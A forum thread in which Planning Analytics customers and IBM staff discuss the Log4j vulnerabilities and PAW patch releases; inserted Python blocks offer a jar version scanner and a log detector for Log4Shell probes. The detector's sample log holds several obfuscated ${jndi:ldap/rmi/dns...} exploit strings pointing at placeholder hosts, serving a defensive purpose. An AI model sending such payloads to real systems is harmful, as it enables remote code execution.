Planning Analytics


Log4j exploit and security alert

  • 1.  Log4j exploit and security alert

    Posted Sun December 12, 2021 11:51 AM
    Hello! How are TM1 and CA affected by the recent log4j security alert? What are IBM's plans to supply a fix?

    FYI: https://www.zdnet.com/article/security-warning-new-zero-day-in-the-log4j-java-library-is-already-being-exploited/

    ------------------------------
    Ryan Clapp
    ------------------------------

    #PlanningAnalyticswithWatson


  • 2.  RE: Log4j exploit and security alert

    Posted Mon December 13, 2021 04:26 AM
    Hi,

    Yes, I would like to know if IBM are aware of this and are working on a patch, as we have had a few customers raise tickets with us over the weekend about this security threat.

    Thanks
    Ian

    ------------------------------
    Ian Moy
    ------------------------------



  • 3.  RE: Log4j exploit and security alert

    Posted Mon December 13, 2021 04:29 AM
    Just to add to the chorus, we've also had customers raise queries, so it would be good to get formal statements from IBM.

    ------------------------------
    Steven Rowe
    ------------------------------



  • 4.  RE: Log4j exploit and security alert

    Posted Mon December 13, 2021 05:08 AM
    I've had this back from the IBM support desk.

    Sure, this issue is still being investigated. I'm posting the official statement below:

    Please be advised that we are investigating this issue at the moment and updates regarding vulnerabilities will be posted on the PSIRT website once available. We advise IBM customers to monitor the PSIRT website as further updates become available.
    https://www.ibm.com/trust/security-psirt
    https://www.ibm.com/blogs/psirt/
    https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/
    We understand this has been identified as a global threat. We will keep you posted once we have an update from the security development team.


    ------------------------------
    Steven Rowe
    ------------------------------



  • 5.  RE: Log4j exploit and security alert

    Posted Mon December 13, 2021 08:20 AM
    Everything I found so far is this blog site from IBM:

    https://www.ibm.com/blogs/psirt/category/severity-critical/

    Yesterday they posted the following statement: https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/
    which says they are currently investigating all IBM products to determine whether they are affected, and will update the blog if anything is found.

    ------------------------------
    Sebastian Klein
    ------------------------------



  • 6.  RE: Log4j exploit and security alert

    Posted Mon December 13, 2021 09:02 AM
    Hi,

    One of our customers has apparently detected the vulnerability in Planning Analytics Workspace v2.0.63, in the following docker image file

    E:\Docker\windowsfilter\1883d7e08acf52687bd45e08f312c5c9e31ccccf1b2fce142777bf7cda1465bf\Files\pa-predict-svc\wlp\usr\servers\defaultServer\lib\global\log4j-core-2.7.jar

    They have another server that has an earlier version of workspace installed (v2.0.54) and that seems to be ok. I can't verify any of this but it's coming from a dedicated security team at a customer site with experience in security threats and attacks of this nature.

    Regards
    Ian

    ------------------------------
    Ian Moy
    ------------------------------



  • 7.  RE: Log4j exploit and security alert

    Posted Mon December 13, 2021 10:09 AM
    Ian,

    Looking at PAW Local 2.0.70 on RHEL, I have 17 "log4j-core*.*" files of three versions: 2.11.2, 2.13.2, and 2.14.1. They are in different /var/lib/containers/storage/overlay/... subfolders. They need to be version 2.15 to contain the fix the Apache Foundation put out on Thursday.  PA 2.0.9.10 and PASS 2.0.69 seem to have only a couple log4j files, but they are older, log4j-1.2.17.jar from 2016. I believe the warning is for any log4j version before version 2.15 from Thursday, Dec 9, 2021.

    ------------------------------
    Walter Coffen
    Technology Manager
    QueBIT Consulting, LLC
    ------------------------------
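    Walter's count above is done by hand against the container overlay storage. What follows is an added scanner written for this thread; it is not IBM tooling, not Apache code, and not the PowerShell script linked further down. It finds jars named log4j-*.jar or log4j-core-*.jar, descends into war/ear files, reads Implementation-Version from the manifest, and also checks whether org/apache/logging/log4j/core/lookup/JndiLookup.class is still inside the jar, since deleting that class from log4j-core is Apache's documented mitigation for CVE-2021-44228 where an upgrade is not immediately possible. The version-to-CVE mapping is the one the rest of the thread works through (2.15.0 incomplete in non-default configurations, 2.16.0, 2.17.0 and CVE-2021-44832, 2.17.1). The fixture jars that demo() builds are constructed stand-ins, not PAW files; the 2.12.x (Java 7) and 2.3.x (Java 6) backport lines are deliberately not modelled and get flagged as vulnerable.

```python
# Walk a tree for Log4j jars (including jars nested in war/ear files), read each one's
# version, check whether JndiLookup.class is still inside, and map the result to the 2021
# log4j CVEs. Constructed example for this thread: not IBM tooling and not Apache code.
# Only the main 2.x line is modelled; 2.12.x/2.3.x backport releases get flagged conservatively.
import io, os, re, sys, tempfile, zipfile
from collections import namedtuple

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
JAR_NAME = re.compile(r"^log4j(-core)?-(\d[\w.\-]*)\.jar$", re.IGNORECASE)
ARCHIVES = (".jar", ".war", ".ear", ".zip")
Finding = namedtuple("Finding", "path version jndi_present verdict")  # path is outer!inner when nested

def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 1); a pre-release such as '2.0-beta9' sorts below '2.0'."""
    nums = [int(p) for p in re.findall(r"\d+", text.split("-")[0])][:3]
    return tuple(nums + [0] * (3 - len(nums))) + ((0,) if "-" in text else (1,))

def classify(version, jndi_present):
    if not re.match(r"\d", version):
        return "unknown version: " + ("JndiLookup.class present, treat as vulnerable" if jndi_present else "review manually")
    v = parse_version(version)
    if v < (2, 0, 0, 0):
        return "log4j 1.x: not affected by CVE-2021-44228, but end of life"
    if v < (2, 16, 0, 1):
        if not jndi_present:  # Apache's 'zip -q -d <jar> .../JndiLookup.class' mitigation
            return "JndiLookup.class removed: CVE-2021-44228/45046 mitigated"
        if v < (2, 15, 0, 1):
            return "VULNERABLE: CVE-2021-44228 (Log4Shell)"
        return "2.15.0: CVE-2021-45046 if a PatternLayout uses Thread Context data"
    if v < (2, 17, 0, 1):
        return "2.16.0: CVE-2021-45105 (denial of service via recursive lookup)"
    if v < (2, 17, 1, 1):
        return "2.17.0: CVE-2021-44832 (needs attacker-controlled configuration)"
    return "2.17.1 or later: none of the 2021 log4j CVEs"

def _manifest_version(zf, names):
    text = zf.read("META-INF/MANIFEST.MF").decode(errors="replace") if "META-INF/MANIFEST.MF" in names else ""
    m = re.search(r"^Implementation-Version:\s*(\S+)", text, re.M)
    return m.group(1) if m else None

def _scan_archive(zf, label, depth):
    names = set(zf.namelist())
    jndi = JNDI_CLASS in names
    m = JAR_NAME.match(os.path.basename(label))
    if m or jndi:  # named log4j(-core)-x.y.z, or a shaded jar that carries the class
        version = _manifest_version(zf, names) or (m.group(2) if m else "unknown")
        yield Finding(label, version, jndi, classify(version, jndi))
    if depth >= 3:  # war inside ear inside zip is as deep as real deployments go
        return
    for name in names:
        if name.lower().endswith(ARCHIVES):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    yield from _scan_archive(inner, f"{label}!{name}", depth + 1)
            except zipfile.BadZipFile:
                continue

def scan_tree(root):
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVES):
                path = os.path.join(dirpath, f)
                try:
                    with zipfile.ZipFile(path) as zf:
                        findings.extend(_scan_archive(zf, path, 0))
                except zipfile.BadZipFile:
                    continue
    return findings

def _jar_bytes(version, jndi=True):
    """Constructed minimal jar: a manifest plus, optionally, a stand-in JndiLookup.class."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n")
        if jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()

def demo():
    """Scan constructed fixtures mirroring the thread's reports; returns {relative path: verdict}."""
    with tempfile.TemporaryDirectory() as root:
        lib = os.path.join(root, "wlp", "lib")
        os.makedirs(lib)
        fixtures = {"log4j-core-2.14.1.jar": _jar_bytes("2.14.1"),              # unpatched
                    "log4j-1.2.17.jar": _jar_bytes("1.2.17", jndi=False),       # 1.x, end of life
                    "log4j-core-2.10.0.jar": _jar_bytes("2.10.0", jndi=False),  # class deleted
                    "log4j-api-2.14.1.jar": _jar_bytes("2.14.1", jndi=False)}   # api jar, not core
        for name, data in fixtures.items():
            with open(os.path.join(lib, name), "wb") as fh:
                fh.write(data)
        war = io.BytesIO()  # a patched core jar one level down, as in WEB-INF/lib
        with zipfile.ZipFile(war, "w") as zf:
            zf.writestr("WEB-INF/lib/log4j-core-2.17.0.jar", _jar_bytes("2.17.0"))
        with open(os.path.join(root, "app.war"), "wb") as fh:
            fh.write(war.getvalue())
        return {f.path[len(root) + 1:].replace(os.sep, "/"): f.verdict for f in scan_tree(root)}

if __name__ == "__main__":  # python log4j_scan.py /var/lib/containers/storage  (no argument: demo)
    results = {f.path: f.verdict for f in scan_tree(sys.argv[1])} if len(sys.argv) > 1 else demo()
    for path, verdict in results.items():
        print(f"{path}: {verdict}")
```

    Pointed at /var/lib/containers/storage (or the E:\Docker\windowsfilter tree on Windows) it reads image layers on the host, so a hit means the image ships that jar, not that the process currently running is reachable; for PAW the supported fix is the upgraded release, not editing jars inside layers. The log4j-api jar is skipped on purpose: only log4j-core carries the JNDI lookup.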



  • 8.  RE: Log4j exploit and security alert

    Posted Mon December 13, 2021 11:50 AM
    Hi Walter,

    That is pretty much the conversation I have just had with a customer. They seem to indicate to me that they could not detect any problems with the PA & PASS box but they were concerned about their PAW server.

    Even though they host servers behind their own firewall, they have decided to stop the PAW box for now and wait for IBM to post an update about it. I guess that is their choice and they are taking the cautious approach, especially given recent issues they have had with security attacks. 

    Regards

    ------------------------------
    Ian Moy
    ------------------------------



  • 9.  RE: Log4j exploit and security alert

    Posted Mon December 13, 2021 12:30 PM
    Yes, we also have customers who have shut their PAW servers down, would be good to have some hint of timescales from IBM.  No PAW, no TM1 these days....
    In terms of tracking if you are impacted you can look in the license files, though of course it is unknown how much effort goes into keeping the license files in sync with the product.
    For PAW, under ...../licenses/notices/, in PAW v26 and PAW v70 we found licence references to v1.2.17, v2.7 and v2.9.1.

    For TM1 every trace we can see in the reference information indicates 1.2 or 1.3 releases, which is before the vulnerability was released.

    Basically use notepad++ to search text files for Log4j

    What an exciting Monday!

    ------------------------------
    Steven Rowe
    ------------------------------



  • 10.  RE: Log4j exploit and security alert

    Posted Wed December 15, 2021 03:54 AM
    Hi.

    PAW R71 has been released to address the issue:
    Security Bulletin: IBM Planning Analytics Workspace: Apache log4j Vulnerability (CVE-2021-44228)

    /Kasper

    ------------------------------
    Kasper Dueholm
    ------------------------------



  • 11.  RE: Log4j exploit and security alert

    Posted Fri December 17, 2021 10:31 AM

    We also found references to old versions
    ...WEB-INF\lib\log4j-1.2.17.jar,Implementation-Version: 1.2.17

    This version 1.x has been "end of life" since 2015. It should not have been in PAW in the first place. This has raised serious concerns with customers. Does anyone have any insights on why this old version was used, and is there any response from IBM to it?

    I have raised a ticket, but so far I haven't received a (satisfying) answer.



    ------------------------------
    Matthias Mazaj
    ------------------------------



  • 12.  RE: Log4j exploit and security alert

    Posted Mon December 13, 2021 04:29 PM
    Here is a very useful #PowerShell script which scans all local drives for presence of log4j jar files and analyzes the contents of the jar file to determine if it is vulnerable to #log4shell (CVE-2021-44228) vulnerability.
    https://twitter.com/sstranger/status/1470310778830004225

    Vaccine for said vulnerability
    https://www.bankinfosecurity.com/log4j-vaccine-released-for-exploited-apache-zero-day-a-18105

    All credit goes to respective authors...


    ------------------------------
    Allan Beals
    Principal
    Agile Sytems, LLC
    Seattle
    (425) 402-4453 x601
    ------------------------------



  • 13.  RE: Log4j exploit and security alert

    IBM Champion
    Posted Wed December 15, 2021 08:58 AM
    Edited by System Fri January 20, 2023 04:17 PM
    In case anyone didn't get the email or see the previous post about the fix...

    IBM Planning Analytics Local
    Security bulletin: IBM Planning Analytics Workspace: Apache log4j Vulnerability (CVE-2021-44228)
    The IBM Planning Analytics Workspace component of IBM Planning Analytics is affected by a security vulnerability. Apache Log4j is used by IBM Planning Analytics Workspace as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j (CVE-2021-44228) vulnerability.

    #PlanningAnalyticswithWatson


  • 14.  RE: Log4j exploit and security alert

    Posted Wed December 15, 2021 09:07 AM
    Edited by System Fri January 20, 2023 04:28 PM
    Hi.

    Looks like PAW R71 comes with Log4j 2.15.0 which also has problems.... Not sure if this causes issues for PAW(?)

    Log4j 2.16.0 has already been released:
    **************
    It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations.
    **************
    Source: Log4j – Apache Log4j 2

    /Kasper

    ------------------------------
    Kasper Dueholm
    ------------------------------



  • 15.  RE: Log4j exploit and security alert

    IBM Champion
    Posted Wed December 15, 2021 09:55 AM
    Thanks for highlighting this Kasper.


    ------------------------------
    George Tonkin
    ------------------------------



  • 16.  RE: Log4j exploit and security alert

    Posted Wed December 15, 2021 10:36 AM
    So...what's the consensus, is PAW 71 ready as a patch for the issue or not?  Appreciate this isn't IBM's issue that the initial Apache patch wasn't complete, but it would be good to get some sensible statements around the level of risk here.
    From what I understand:
    1.  If PAW is behind company firewalls, this mitigates the risk, although you could have a bad actor within your organisation.
    2.  AFAIK there is no way for end users to write to the logs (assuming no hacks of PAW itself).  If users can't write to the logs then the risk is zero.  There are some big assumptions here though, as I don't really know what log4j is used for in PAW.  Is it just "error logs" to text files?

    I guess the only sensible option is patch, given no statements about the level of risk involved for the specific product.

    We'd already started pushing 71 to customers.

    Also note that this page states that Planning Analytics is not impacted, which is pretty ambiguous / misleading....
    https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/

    ------------------------------
    Steven Rowe
    ------------------------------
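    On point 2 in the post above: the lookup that CVE-2021-44228 abuses runs on the content of the logged message, so the question is which attacker-supplied strings reach a log call (User-Agent and other request headers, usernames, query parameters), not who can write to the log files. The detector below is an added example for this thread, not IBM's or Apache's code and not a substitute for patching. It resolves log4j's nested ${...} lookups the way log4j itself would, so obfuscated probes (${${lower:j}ndi:...}, ${${::-j}ndi:...}, URL-encoded %24%7B) collapse to the ${jndi:scheme://host} they hide, and it extracts the callback host as an indicator. The lines in SAMPLE_LOG are constructed; the addresses are documentation ranges, not real hosts.

```python
# Detect Log4Shell probes in access or application logs by collapsing log4j's ${...}
# lookup syntax the way log4j would, so obfuscated forms reduce to ${jndi:...}.
# Constructed example for this thread: not a product feature, not a complete IDS rule.
import re
from dataclasses import dataclass
from urllib.parse import unquote

INNER = re.compile(r"\$\{([^${}]*)\}")                       # an innermost lookup, nothing nested inside
JNDI = re.compile(r"\$\{jndi:(\w+):/*([^/}\s]+)", re.IGNORECASE)


def _evaluate(expr):
    """Evaluate one innermost lookup body the way attackers rely on log4j doing it:
    default values (${env:X:-j} and ${::-j} both yield 'j'), ${lower:J} and ${upper:j}."""
    if ":-" in expr:
        return expr.split(":-", 1)[1]
    prefix, _, key = expr.partition(":")
    if prefix.lower() == "lower":
        return key.lower()
    if prefix.lower() == "upper":
        return key.upper()
    return ""  # date:, sys:, ctx: and friends: not attacker-controllable here, drop them


def normalize(text, max_rounds=20):
    """Collapse nested lookups from the inside out; ${jndi:...} is kept as the terminal form."""
    for _ in range(max_rounds):
        new = INNER.sub(lambda m: m.group(0) if m.group(1).lower().startswith("jndi:")
                        else _evaluate(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


@dataclass
class Hit:
    line_no: int
    scheme: str   # ldap, ldaps, rmi, dns, iiop ...
    target: str   # host[:port] the victim JVM would connect to: your indicator
    raw: str


def scan_lines(lines):
    hits = []
    for n, line in enumerate(lines, 1):
        text = unquote(line)            # probes often arrive URL-encoded (%24%7B -> ${)
        if "${" not in text:
            continue
        for m in JNDI.finditer(normalize(text)):
            hits.append(Hit(n, m.group(1).lower(), m.group(2), line.strip()))
    return hits


def targets(hits):
    return {h.target for h in hits}


# Constructed access-log lines: one benign, five probe variants, one benign lookup.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Dec/2021:09:02:11 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [13/Dec/2021:09:02:13 +0000] "GET / HTTP/1.1" 200 88 "-" "${jndi:ldap://198.51.100.7:1389/a}"
10.0.0.9 - - [13/Dec/2021:09:02:14 +0000] "GET / HTTP/1.1" 200 88 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b}"
10.0.0.9 - - [13/Dec/2021:09:02:15 +0000] "GET / HTTP/1.1" 200 88 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.4:1099/Exploit}"
10.0.0.9 - - [13/Dec/2021:09:02:16 +0000] "GET /?x=${${env:BARFOO:-j}ndi${env:BARFOO:-:}dns://203.0.113.4/cb} HTTP/1.1" 400 0 "-" "curl/7.79"
10.0.0.9 - - [13/Dec/2021:09:02:17 +0000] "GET /?x=%24%7Bjndi%3Aldaps%3A%2F%2F203.0.113.4%3A636%2Fz%7D HTTP/1.1" 400 0 "-" "curl/7.79"
10.0.0.5 - - [13/Dec/2021:09:03:00 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 10 "-" "Mozilla/5.0"
"""


def demo():
    return scan_lines(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for h in demo():
        print(f"line {h.line_no}: {h.scheme}://{h.target}  <- {h.raw[:70]}")
    print("indicators:", sorted(targets(demo())))
```

    The last sample line shows why a naive `${` match is too noisy: `${date:yyyy}` is a legitimate lookup and produces no hit. Point the same functions at the real access and application logs of a PAW host (or at the proxy in front of it) to find out whether probes reached it before the upgrade, and feed the extracted hosts into egress logs to see whether the JVM ever answered.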



  • 17.  RE: Log4j exploit and security alert

    IBM Champion
    Posted Wed December 15, 2021 11:08 AM
    Edited by System Fri January 20, 2023 04:25 PM

    Soufiane has commented that

    "PAW uses log4j in its default configuration. Hence, the fixes in log4j 2.16 are not needed, based on our current assessment. Nonetheless, we plan to upgrade log4j to the latest version in future releases of PAW."

    Thanks for this reassurance again @Soufiane Azizi



    ------------------------------
    George Tonkin
    ------------------------------



  • 18.  RE: Log4j exploit and security alert

    Posted Thu December 16, 2021 04:09 AM
    Adding to the thread... I opened some tickets on this yesterday.

    We've now got the advice that we need to upgrade PAW to 2.0.71, but I raised the first ticket around the conformance of the other components in the PA suite which we need to move to if moving to PAW 2.0.71

    We are using PA 2.0.9.9, so should be OK there, but since our PASS and PAfE are both 2.0.64 we'll have to move up to 2.0.69 if we are to maintain the conformance of N-2

    Has anyone run PAW release significantly higher than their other components ?

    The second ticket was raised around our Cognos Analytics release 11.1.6 IF002, which overnight I have confirmed will now need to be upgraded to 11.1.7 and detailed:
    https://www.ibm.com/support/pages/node/6526474

    The document does state "IBM is developing a "non-upgrade" option for "On Prem" customers that will patch the system and allow customers to remain on their current applicable version. This option will be announced and available shortly." ... which for us would be the preferred solution.





    ------------------------------
    AJAY CHANDHOK
    ------------------------------



  • 19.  RE: Log4j exploit and security alert

    Posted Thu December 16, 2021 07:50 AM

    We did an upgrade as well to the latest interim fix 6 for 11.1.7 and rescanned for the vulnerability afterwards. We came to the conclusion that IBM has implemented the 2.15 version of Log4j, so it's still vulnerable. So be aware. We already informed IBM about this.



    ------------------------------
    Michiel Schakel
    ------------------------------



  • 20.  RE: Log4j exploit and security alert

    Posted Thu December 16, 2021 08:08 AM
    Hi Michiel.

    I raised that question in comment no. 13 in this thread...
    According to answer no. 16 in this thread PAW should be secure since it is using default configuration.

    But it would be nice with an official confirmation of this from IBM and not a LinkedIn comment...

    So if you hear from IBM Support please let us know :)

    ------------------------------
    Kasper Dueholm
    ------------------------------



  • 21.  RE: Log4j exploit and security alert

    Posted Fri December 17, 2021 10:18 AM
    There has been much attention made on this issue as regards PAW however I am still unclear on the impact/remedy as regards TM1Web.  Any further insights?

    ------------------------------
    Dean Watts
    ------------------------------



  • 22.  RE: Log4j exploit and security alert

    IBM Champion
    Posted Fri December 17, 2021 10:29 AM

    HI Dean,

    Have a look at Soufiane's comment here.

    "George, the current assessment of the Apache log4j Vulnerability (CVE-2021-44228) for all of Planning Analytics shows that only PAW is affected. Hence, as stated in the bulletin, the remediation for all of PA is to upgrade PAW to V2.0.71"



    ------------------------------
    George Tonkin
    ------------------------------



  • 23.  RE: Log4j exploit and security alert

    Posted Fri December 17, 2021 03:45 PM
    I just noticed this here:

    Update December 17, 2:20 pm
    IBM is focused on moving to Log4j Version 2.15 as quickly as possible for all applications impacted by CVE-2021-44228. Work also is underway to move to Log4j Version 2.16, for all impacted applications, but our priority right now is to move to at least Version 2.15.

    With so much active industry research on Log4j, we will continually see mitigation and remediation recommendations. We continue to review the latest information and share updates accordingly.



    ------------------------------
    Walter Coffen
    Technology Manager
    QueBIT Consulting, LLC
    ------------------------------



  • 24.  RE: Log4j exploit and security alert

    Posted Tue December 21, 2021 09:41 AM
    PAW 2.0.72 was put on Fix Central last night. Looks like log4j 2.17 released by the Apache foundation 12/18/2021 was incorporated. I verified 2.17 in the Linux install of PAW 2.0.72 I just did.

    Security Bulletin

    ------------------------------
    Walter Coffen
    Technology Manager
    QueBIT Consulting, LLC
    ------------------------------



  • 25.  RE: Log4j exploit and security alert

    Posted Tue January 18, 2022 04:20 PM
    Sorry to bring this back to the fore, but we've upgraded our entire suite of PA components to latest release and have just seen that Apache have documented a new log4j 2.17.1, right at the end of December:

    Apache 2.17.1

    This doesn't look like it's in the latest PAW 2.0.72 which is covering log4j 2.17

    Can someone confirm this is the case please and if so, is there an imminent PAW release about to the added to Fix Central for download ?

    Cheers
    Ajay

    ------------------------------
    AJAY CHANDHOK
    ------------------------------



  • 26.  RE: Log4j exploit and security alert

    Posted Wed January 19, 2022 04:12 AM
    Edited by System Fri January 20, 2023 04:15 PM
    Hi All

    I have raised the ticket this morning with IBM, response below:

    "You are right, CVE-2021-44832 is not connected with previous Log4j vulnerability and fix for it was not included in PAW 72. CVE-2021-44832 is already reported and development team is assessing the impact on the Planning Analytics. Once they finish the assessment, corresponding bulletin will be posted via PSIRT portal.

    https://www.ibm.com/trust/security-psirt

    https://www.ibm.com/blogs/psirt/

    APAR number:

    PH43238 PLANNING ANALYTICS VULNERABILITY ASSESSMENT CVE-2021-44832

    Once the fix is ready I will let you know within this case too."



    Anyone about to upgrade may want to keep an eye out on Fix Central and the links above for updates

    Ajay



    ------------------------------
    AJAY CHANDHOK
    ------------------------------



  • 27.  RE: Log4j exploit and security alert

    Posted Wed January 19, 2022 08:16 AM
    I can confirm the Planning Analytics Workspace 2.0.72 release uses log4j 2.17.0.  The next release (2.0.73) will update to log4j 2.17.1.

    The Planning Analytics team is paying close attention to the situation with log4j vulnerabilities.

    ------------------------------
    Stuart King
    IBM Planning Analytics Offering Manager
    ------------------------------



  • 28.  RE: Log4j exploit and security alert

    Posted Wed January 19, 2022 09:25 AM
    Thank you for confirming Stuart.

    Do we have an estimated date for PAW 2.0.73 availability on Fix Central at this stage ?

    Ajay

    ------------------------------
    AJAY CHANDHOK
    ------------------------------



  • 29.  RE: Log4j exploit and security alert

    Posted Wed January 19, 2022 09:40 AM
    The ETA for the next Planning Analytics Workspace release (2.0.73) is mid February.  As always, this is just an estimate and is subject to change.

    ------------------------------
    Stuart King
    IBM Planning Analytics Offering Manager
    ------------------------------